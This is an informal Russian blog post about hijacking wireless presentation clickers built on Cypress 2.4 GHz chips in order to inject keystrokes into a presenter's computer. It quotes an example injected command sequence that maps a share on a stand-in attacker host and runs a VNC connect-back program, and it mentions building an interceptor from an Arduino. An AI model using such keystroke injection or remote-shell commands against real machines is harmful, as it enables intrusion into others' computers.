Пульт для презентаций — источник взлома
Как Вы думаете, что в мире еще не взломано? Вот сижу, чешу репу и думаю, а в ответ тишина раздается в башке гулким эхом… Ну да ладно, вобщем я к тому веду, что все сделанное с помощью рук и паяльника можно хакнуть, были б мозги! Например, такая безобидная штуковина, как пульт для презентаций, может стать грозным оружием в руках сумасшедшего «гика», задумавшего захват планету. Так или иначе, с помощью новых технологий можно перехватить сигнал с пульта и полностью подчинить его себе в момент выступления, забавная, наверно, шутка бы вышла. Более худший вариант состоит в том, что с помощью пульта вполне возможно передавать нажатия клавиш, необходимых в ходе презентации компьютеру.
net use X: http:// attacker/webdavshare
X:\VNCconnectback.exe
[enter]
Данные методы широко используют на пультах Logitech R-R0001, R400, но главная уязвимость состоит в микросхеме определенной сборки, а именно от производителя Cypress Semiconductors. Если, кроме Википедии, задать пару нужных ключевиков в строку поиска, то можно найти действительно ценные учебники по взлому радиоприборов. Раньше, я как-то и не задумывался о том, что 27-герцовую радиоклавиатуру можно прослушивать с помощью самодельного приборчика, сделанного за пару часик, об этом оказывается известно всем, а оказалось совсем и не всем, а только тем кто этим занимается. Сложнее задача обстоит с клавиатурами 2,4 ГГц, на их взлом удосужились только в конце 2009 года. Частоту эту побороли, пришло время ломать пульты для управления презентациями, принцип работы которых, практически не отличим от клавиатуры, потому, что в такого рода гаджетах используется одинаковый 2,4 Ггц-вые чипы CYRF6936/CYRF69103 фирмы Cypress Semiconductors, которые в свою очередь работают по коммерческому беспроводному протоколу.
Вобщем задача перехвата сигнала свелась к минимуму, например, чтоб сконструировать такое устройство необходимо лишь конструктор Arduino и беспроводный модуль за 30 евро.
Твитнуть